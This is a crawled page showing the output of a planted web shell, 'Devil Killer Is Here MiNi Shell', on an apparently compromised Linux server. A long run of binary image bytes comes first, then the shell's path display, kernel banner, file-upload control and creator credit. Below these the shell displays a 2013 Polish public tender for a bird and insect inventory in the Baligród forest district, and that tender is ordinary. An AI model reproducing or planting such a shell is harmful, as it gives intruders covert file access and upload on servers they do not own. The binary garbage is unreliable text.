JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130731/304862-N-2013.html

<p class="kh_header"><b>Baligród: Przeprowadzenie inwentaryzacji przyrodniczej wybranych gatunków ptaków na obszarze 5770 ha i owadów na obszarze 1830 ha w Dolinie Rabskiego Potoku i Dolinie Łopienki na terenie Nadleśnictwa Baligród - SA-2710-22/13</b><br>
<b>Numer ogłoszenia: 304862 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Baligród , ul. Bieszczadzka 15, 38-606 Baligród, woj. podkarpackie, tel. 013 4684015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krosno.lasy.gov.pl/baligrod</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka  organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie inwentaryzacji przyrodniczej wybranych gatunków ptaków na obszarze 5770 ha i owadów na obszarze 1830 ha w Dolinie Rabskiego Potoku i Dolinie Łopienki na terenie Nadleśnictwa Baligród - SA-2710-22/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie badań terenowych dotyczących inwentaryzacji wybranych ptaków i owadów:
1.1.Inwentaryzacja dotyczy następujących gatunków ptaków: bocian czarny, orlik krzykliwy, orzeł przedni, derkacz, puchacz, sóweczka, puszczyk uralski, włochatka, dzięcioł zielonosiwy, dzięcioł czarny, dzięcioł białogrzbiety i dzięcioł trójpalczasty. 
1.2.Obszar inwentaryzacji obejmuje 5770 ha w tym: 
Obręb Baligród: Leśnictwa Czarne, Kalnica, Karolów, część leśnictwa Roztoki (oddziały: 100-102, 104, 107-117) 
Obręb Bukowiec: część leśnictwa Polanki (oddziały 150-152, 154-161, 70-75)
1.3.Opracowanie musi zawierać: 
- opis rozmieszczenia wyżej wymienionych gatunków wraz z częścią mapową (miejsca gniazdowania, miejsca żerowania).
- propozycję utworzenia stref ochronnych dla gatunków wymagających takich stref wraz z zaznaczeniem tych stref na mapie.
- opis zbiorowisk roślinnych i typów siedlisk przyrodniczych Natura 2000 zajmowanych przez wyżej wspomniane gatunki (miejsca rozrodu, żerowania).
- określenie potencjalnego rozwoju populacji wyżej wspomnianych gatunków na obszarze inwentaryzacji.
- propozycje działań ochronnych dla wyżej wspomnianych gatunków.
- dokumentacja fotograficzna - zinwentaryzowane gniazda, dziuple, bądź biotopy lęgowe, ptaki.
1.4.Dla gatunków ptaków metodykę należy oprzeć na publikacji: Monitoring ptaków lęgowych. Poradnik metodyczny dotyczący gatunków chonionych Dyrektywą Ptasią wyd. GIOŚ Biblioteka Monitoringu Środowiska. Wyżej przytoczona metodyka zawierająca szczegółowy opis wykonywania inwentaryzacji znajduje się w załączniku nr 5 do niniejszej SIWZ.
Zadanie 2:Inwentaryzacja przyrodnicza wybranych gatunków owadów.
2.1.Inwentaryzacja dotyczy następujących gatunków owadów: krasopani Hera, nadobnica alpejska, biegacz urozmaicony, czerwończyk nieparek, zgniotek cynobrowy.
2.2.Obszar inwentaryzacji obejmuje 1830 ha w tym:
Obręb Baligród: oddziały: 112, 113, 118, 119, 120, 120A, 121, 122, 122A,123, 124, 126, 127, 128, 129, 130, 131, 138, 139, 140, 167, 168, 169, 184, 185, 201, 202, 215, 221, 222.
Obręb Bukowiec: oddziały: 71, 72, 154, 155, 156, 158, 158A, 159A.
2.3.Opracowanie musi zawierać:
-opis rozmieszczenia wyżej wymienionych gatunków wraz z częścią mapową.
-opis zbiorowisk roślinnych i typów siedlisk przyrodniczych Natura 2000 zajmowanych przez wyżej wspomniane gatunki.
-określenie potencjalnego rozwoju populacji wyżej wspomnianych gatunków na obszarze inwentaryzacji.
-propozycje działań ochronnych dla wyżej wspomnianych gatunków.
-dokumentacje fotograficzna - obserwacje owadów, żerowisk (nadobnica alpejska).
2.4.Dla wyżej wymienionych gatunków owadów metodykę należy oprzeć na publikacjach: INSPEKCJI OCHRONY ŚRODOWISKA:
-Monitoring gatunków zwierząt - Przewodnik metodyczny - Część pierwsza - opracowanie zbiorowe pod redakcją Małgorzaty Makomaskiej-Juchiewicz
-Monitoring gatunków zwierząt - Przewodnik metodyczny - Część druga Opracowanie zbiorowe pod redakcją Małgorzaty Makomaskiej-Juchiewicz i Pauliny Baran
Wybrane opracowania dla przedmiotowych gatunków znajdują się w poniższych załącznikach:
Przewodnik metodyczny-krasopani Hera-Opracował : Łukasz Przybyłowicz - znajdujący się w załączniku nr 6 do SIWZ.
Przewodnik metodyczny - nadobnica alpejska - Opracował: Zbigniew Witkowski - znajdujący się w załączniku nr 7 do SIWZ.
Przewodnik metodyczny - biegacz urozmaicony - Opracował: Mieczysław Stachowiak - znajdujący się w załączniku nr 8 do SIWZ.
Przewodnik metodyczny - zgniotek cynobrowy - Opracował: Mieczysław Stachowiak - znajdujący się w załączniku nr 9 do SIWZ.

2.Celem inwentaryzacji będzie określenie aktualnego stanu wybranych walorów przyrodniczych, uzyskanie informacji na temat występowania, liczebności populacji oraz rozmieszczenia wybranych gatunków ptaków i owadów na badanym terenie. Wyniki badań będą również podstawą do ewentualnego korygowania zabiegów ochronnych.
3.Prace będą składać się z trzech następujących etapów:
1.Prace przygotowawcze: zamawiający po podpisaniu umowy przekaże wykonawcy warstwy Leśnej Mapy Numerycznej w układzie PUWG 1992, format Shapefile (.shp), które należy odpowiednio przystosować do inwentaryzacji. Przed przystąpieniem do prac należy zapoznać się z metodyką oraz topografią terenu, wyznaczyć w terenie stałe punkty obserwacji, które będą wykorzystywane podczas badań terenowych oraz przeprowadzić rozpoznanie wśród służb terenowych Nadleśnictwa Baligród w celu uzyskania informacji o potencjalnych miejscach występowania inwentaryzowanych gatunków. Ankiety (historyczne) i inne dane jakie posiada zamawiający, a mogące pomóc w zlokalizowaniu inwentaryzowanych gatunków zostaną przekazane wykonawcy zamówienia.
2.Prace terenowe: wykonanie terenowych badań inwentaryzacyjnych.
3.Opracowanie wyników inwentaryzacji -  na podstawie uzyskanych wyników z badań terenowych należy przygotować raport końcowy zawierający min. takie parametry jak skład gatunkowy, liczebność, zagęszczenie, rozmieszczenie gatunków w postaci załączników graficznych - mapy. Mapy tematyczne, będące integralną częścią dokumentacji, sporządza się w formie cyfrowej z wykorzystaniem Leśnej Mapy Numerycznej w układzie PUWG 1992 oraz w formie wydruków w skali 1:5000 lub innej zapewniającej czytelność przedstawionych danych po uzgodnieniu z Zamawiającym. 
Wykonawca wraz z ostateczną wersją raportu końcowego podsumowującego inwentaryzację przekaże Zamawiającemu warstwy mapy numerycznej sporządzone na potrzeby inwentaryzacji w układzie współrzędnych PUWG 1992, format ESRI shapefile (.shp). 
Wykonawca zobowiązany jest gromadzić tabelaryczne dane wejściowe w postaci arkusza kalkulacyjnego umożliwiającego dalszą obróbkę danych liczbowych.
Raport końcowy musi zawierać dokumentacje fotograficzną (minimum 2 zdjęcia z każdej powierzchni badawczej). Zdjęcia powinny zostać dostarczone w formie wydruku jako element raportu końcowego oraz w wersji elektronicznej (na płycie CD) w rozdzielczości pozwalającej na ich wydruk w formacie A4
Dodatkowo Wykonawca przygotuje wykazy zawierające opracowane w ramach inwentaryzacji klasy obiektów GIS. Wykaz ma uwzględniać następujące informacje: nazwa pliku .shp, opis zawartości pliku, źródło danych (np. ortofotomapa, pomiary GPS itp.).
Wytyczne dotyczące wydruków map tematycznych:
oddzielne mapy dla ptaków i owadów oraz mapa zagrożeń;
na mapie należy uwzględnić:
- skupiska stanowisk owadów
- terytoria (np. obszary wykorzystywane przez dany gatunek),
- skupiska stanowisk (np. kolonie lęgowe).
- siedliska potencjalne dla poszczególnych gatunków
Warstwy mapy numerycznej zawierające dane z inwentaryzacji muszą uwzględniać następujące atrybuty:
nazwa polska gatunku,
nazwa łacińska gatunku,
jednostka liczebności (tabela 1),
liczebność (należy podać dokładną wartość lub liczebność wyrażoną w przedziałach).
Tabela 1. Słownik jednostek.
Kod	 
p para/pary
o osobnik/osobniki
s samiec/samce
f samica/ samice

Raport z inwentaryzacji (w tym mapy) należy wykonać w 3 jednakowych egzemplarzach (wraz z wersją elektroniczną na płytach CD):
- napisany w języku polskim,
- rozmiar czcionki 12 (preferowana),
- czcionka - Arial (preferowana),
- format A4,
- dokumentacja trwale zszyta np. zbindowana z okładką zawierającą podpis:
Inwentaryzacja wybranych ptaków i owadów w ramach realizacji projektu Budowa i modernizacja małej infrastruktury służącej zabezpieczeniu obszarów Natura 2000
płyty CD zawierające: treść raportu z inwentaryzacji w formacie PDF i DOC; dane GIS; mapy tematyczne w formacie JPG 300 dpi. oraz tabelaryczne dane wejściowe w postaci pliku arkusza kalkulacyjnego umożliwiającego dalszą obróbkę danych liczbowych.
Opracowany raport musi zawierać: 
a) flagę Unii Europejskiej - wzór znajduje się w załączniku nr 10 do SIWZ
b) logo Programu Operacyjnego - wzór znajduje się w załączniku nr 10 do SIWZ
c) logo Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej - wzór znajduje się w załączniku nr 10 do SIWZ
wraz z następującą adnotacją: 
Projekt współfinansowany przez Unię Europejską
ze środków Europejskiego Funduszu Rozwoju Regionalnego
w ramach Programu Infrastruktura i Środowisko
Dofinansowano ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej
4.Wykonanie koncepcji monitoringu przyrodniczego: Na podstawie wykonanej inwentaryzacji przyrodniczej należy wykonać koncepcje monitoringu przyrodniczego. Koncepcja winna zawierać opis metodyki obserwacji poszczególnych gatunków ze wskazaniem miejsca oraz terminów wykonania monitoringu. Koncepcja jest integralną częścią inwentaryzacji przyrodniczej (jako odrębny rozdział w opracowaniu).
3.4.Miejscem realizacji zamówienia jest: teren Nadleśnictwa Baligród leśnictwa i oddziały leśnictw wymienione w punkcie 3.1. 
3.5.W przypadku, gdy Wykonawca przewiduje możliwość zlecenia wykonania części przedmiotu zamówienia podwykonawcom jest zobowiązany do wskazania w ofercie tych części zamówienia, których wykonanie powierzy podwykonawcom. Jeżeli Wykonawca nie wskaże takich części, będzie to oznaczało, że zamierza wykonywać zamówienie samodzielnie.
3.6.Zamawiający nie dopuszcza możliwości składania ofert częściowych.
3.7.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3.8.Zamawiający nie przewiduje możliwość udzielenia zamówień uzupełniających.
3.9.Zamawiający informuje, że nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
3.10.Wykonawca ma prawo złożyć tylko jedną ofertę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6, 90.70.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu o udzieleniu zamówienia na podstawie przedstawionych oświadczeń, wykazów i dokumentów w sposób spełnia - nie spełnia. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, bądź wykonuje w przypadku świadczeń okresowych i ciągłych co najmniej jedną usługę o wartości nie mniejszej niż 15 000,00 złotych odpowiadającej przedmiotowi zamówienia, tj. wykonanie inwentaryzacji lub innych opracowań, których częścią składową była inwentaryzacja przyrodnicza np. gminy, doliny rzecznej, parku, rezerwatu itp. 

Celem wykazania spełniania warunków udziału w postepowaniu Wykonawca może polegać, odpowiednio na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności może przedstawić Zamawiającemu w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, (przykładowe formularze zobowiązań znajdują się w załączniku nr 2 do SIWZ - formularze oświadczeń)

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu o udzieleniu zamówienia na podstawie przedstawionych oświadczeń, wykazów i dokumentów w sposób spełnia - nie spełnia. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu o udzieleniu zamówienia na podstawie przedstawionych oświadczeń, wykazów i dokumentów w sposób spełnia - nie spełnia. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu o udzieleniu zamówienia na podstawie przedstawionych oświadczeń, wykazów i dokumentów w sposób spełnia - nie spełnia. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu o udzieleniu zamówienia na podstawie przedstawionych oświadczeń, wykazów i dokumentów w sposób spełnia - nie spełnia. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_baligrod/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Baligród ul. Bieszczadzka 15, 38-606 Baligród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 11:00, miejsce: Nadleśnictwo Baligród ul. Bieszczadzka 15, 38-606 Baligród- sekretariat pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Budowa i modernizacja małej infrastruktury służącej zabezpieczeniu obszarów Natura 2000 - Bieszczady
Zamawiający informuje że, przedmiot niniejszego zamówienia będzie współfinansowany przez Unię Europejską ze środków EFRR (Europejski Fundusz Rozwoju Regionalnego)
oraz NFOŚiGW (Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej) w
ramach Programu Operacyjnego Infrastruktura i Środowisko

Priorytet: V: Ochrona przyrody i kształtowanie postaw ekologicznych.

Działanie: 5.1 Wspieranie kompleksowych projektów z zakresu ochrony siedlisk przyrodniczych (ekosystemów)na obszarach chronionych oraz zachowanie różnorodności gatunkowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com